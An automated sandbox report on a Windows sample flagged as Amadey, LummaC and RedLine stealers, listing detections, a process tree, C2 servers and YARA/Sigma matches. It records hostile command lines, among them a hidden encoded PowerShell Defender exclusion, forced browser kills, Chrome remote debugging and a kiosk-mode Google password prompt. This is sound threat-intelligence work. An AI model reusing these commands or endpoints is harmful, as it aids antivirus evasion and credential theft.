Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cMTqzvmx9u.exe

Overview

General Information

Sample name:cMTqzvmx9u.exe
renamed because original name is a hash value
Original sample name:0a8673bbea31ae21e9e87be408752436.exe
Analysis ID:1580355
MD5:0a8673bbea31ae21e9e87be408752436
SHA1:a8c29df353c7af7928ce3e24a9f606f0787109ac
SHA256:e2ae261a55bc83c0e3c9ab657a16d2c76a329b6a4ff40370119e079f2631b69c
Tags:Amadeyexeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, LummaC Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected RedLine Stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates files in the system32 config directory
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cMTqzvmx9u.exe (PID: 2056 cmdline: "C:\Users\user\Desktop\cMTqzvmx9u.exe" MD5: 0A8673BBEA31AE21E9E87BE408752436)
    • skotes.exe (PID: 3648 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 0A8673BBEA31AE21E9E87BE408752436)
  • skotes.exe (PID: 6680 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 0A8673BBEA31AE21E9E87BE408752436)
  • skotes.exe (PID: 828 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 0A8673BBEA31AE21E9E87BE408752436)
    • 7620ab885d.exe (PID: 2456 cmdline: "C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe" MD5: 1C22D90D4F3C0BE6834E0777C7B4D18A)
      • WerFault.exe (PID: 3780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1980 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • 8469cb4d4d.exe (PID: 7060 cmdline: "C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe" MD5: 15709EBA2AFAF7CC0A86CE0ABF8E53F1)
    • 0a7e8af92e.exe (PID: 632 cmdline: "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe" MD5: 75CA34215F6E3916C51C0AF34FC17284)
      • powershell.exe (PID: 6216 cmdline: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA= MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 4536 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • DJj.exe (PID: 3500 cmdline: "C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe" MD5: 95B7A7CBC0AFF0215004C5A56EA5952C)
    • ba944ca4ff.exe (PID: 820 cmdline: "C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe" MD5: 87330F1877C33A5A6203C49075223B16)
    • 7ddd2a748c.exe (PID: 6504 cmdline: "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe" MD5: 9AB250B0DC1D156E2D123D277EB4D132)
      • conhost.exe (PID: 416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 7ddd2a748c.exe (PID: 3848 cmdline: "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe" MD5: 9AB250B0DC1D156E2D123D277EB4D132)
    • 68f6adf5d5.exe (PID: 7156 cmdline: "C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
      • graph.exe (PID: 3184 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
    • b285303eae.exe (PID: 7044 cmdline: "C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe" MD5: 8A0FEB447F024F32D1EE001A56D7EE23)
    • b9ba85c997.exe (PID: 4164 cmdline: "C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe" MD5: CA7C431ABAC02CFB1B6B43ED9B3457E3)
    • e6e4c20fad.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe" MD5: 7684D60F9F9760FB4AC16A2FA7F5EEDA)
      • chrome.exe (PID: 764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 4580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2068,i,843618081044159646,7048051155427762335,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • fb584dabd7.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe" MD5: 3F47413343D51345115E32189E96C142)
      • taskkill.exe (PID: 3836 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6808 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1588 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6716 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6132 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • firefox.exe (PID: 3748 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • 96e283ac77.exe (PID: 1728 cmdline: "C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe" MD5: A55D697A530E905F6C6539469BA973BD)
  • 68f6adf5d5.exe (PID: 5592 cmdline: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe MD5: 3567CB15156760B2F111512FFDBC1451)
  • graph.exe (PID: 5536 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • svchost.exe (PID: 6892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • firefox.exe (PID: 5264 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 2752 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 6808 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2200 -prefMapHandle 2192 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c580837b-9763-4e9e-ad1e-338f434464c7} 2752 "\\.\pipe\gecko-crash-server-pipe.2752" 20ea916db10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: LummaC

{"C2 url": ["pancakedipyps.click", "tentabatte.lat", "talkynicer.lat", "slipperyloo.lat", "bashfulacid.lat", "manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "curverpluch.lat"], "Build id": "FATE99--test"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: RedLine

{"C2 url": "147.45.44.224:1912", "Bot Id": "1488Traffer", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
    • 0x24cc3:$gen01: ChromeGetRoamingName
    • 0x24ce8:$gen02: ChromeGetLocalName
    • 0x24d2b:$gen03: get_UserDomainName
    • 0x28bc4:$gen04: get_encrypted_key
    • 0x27943:$gen05: browserPaths
    • 0x27c19:$gen06: GetBrowsers
    • 0x27501:$gen07: get_InstalledInputLanguages
    • 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
    • 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
    • 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
    • 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
    • 0x2972a:$spe9: *wallet*
    • 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
    • 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042
    • 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
    • 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
    • 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
    • 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
    • 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02
    • 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
    • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.2343778793.000001C13114E000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      0000001B.00000003.2816284787.0000000000CB6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000001B.00000002.2825365325.0000000000CB6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000B.00000002.2343778793.000001C1310D6000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            0000001B.00000003.2788989135.0000000000CB6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 29 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.0a7e8af92e.exe.1c130c124d0.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                11.2.0a7e8af92e.exe.1c1310fe590.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  11.2.0a7e8af92e.exe.1c1310fe590.3.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
                  • 0x22ec3:$gen01: ChromeGetRoamingName
                  • 0x22ee8:$gen02: ChromeGetLocalName
                  • 0x22f2b:$gen03: get_UserDomainName
                  • 0x26dc4:$gen04: get_encrypted_key
                  • 0x25b43:$gen05: browserPaths
                  • 0x25e19:$gen06: GetBrowsers
                  • 0x25701:$gen07: get_InstalledInputLanguages
                  • 0x21bcc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                  • 0x1218:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                  • 0x27206:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
                  • 0x272a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
                  • 0x2792a:$spe9: *wallet*
                  • 0x1fbea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                  • 0x20114:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                  • 0x201c1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                  • 0x1fb98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                  • 0x1fbc1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
                  • 0x1fd92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
                  • 0x1ffe5:$typ11: 2A19BFD7333718195216588A698752C517111B02
                  • 0x202d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
                  11.2.0a7e8af92e.exe.1c1310d6568.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    11.2.0a7e8af92e.exe.1c1310d6568.2.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
                    • 0x22ec3:$gen01: ChromeGetRoamingName
                    • 0x492eb:$gen01: ChromeGetRoamingName
                    • 0x22ee8:$gen02: ChromeGetLocalName
                    • 0x49310:$gen02: ChromeGetLocalName
                    • 0x22f2b:$gen03: get_UserDomainName
                    • 0x49353:$gen03: get_UserDomainName
                    • 0x25b43:$gen05: browserPaths
                    • 0x25e19:$gen06: GetBrowsers
                    • 0x25701:$gen07: get_InstalledInputLanguages
                    • 0x21bcc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                    • 0x47ff4:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                    • 0x1218:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                    • 0x29240:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                    • 0x1fbea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                    • 0x46012:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                    • 0x20114:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                    • 0x4653c:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                    • 0x201c1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                    • 0x465e9:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                    • 0x1fb98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                    • 0x45fc0:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                    Click to see the 13 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9ba85c997.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe, ParentProcessId: 632, ParentProcessName: 0a7e8af92e.exe, ProcessCommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, ProcessId: 6216, ProcessName: powershell.exe
                    Sigma detected: Browser Started with Remote Debugging
                    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe, ParentProcessId: 6848, ParentProcessName: e6e4c20fad.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 764, ProcessName: chrome.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9ba85c997.exe
                    Sigma detected: Suspicious Execution of Powershell with Base64
                    Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe, ParentProcessId: 632, ParentProcessName: 0a7e8af92e.exe, ProcessCommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, ProcessId: 6216, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
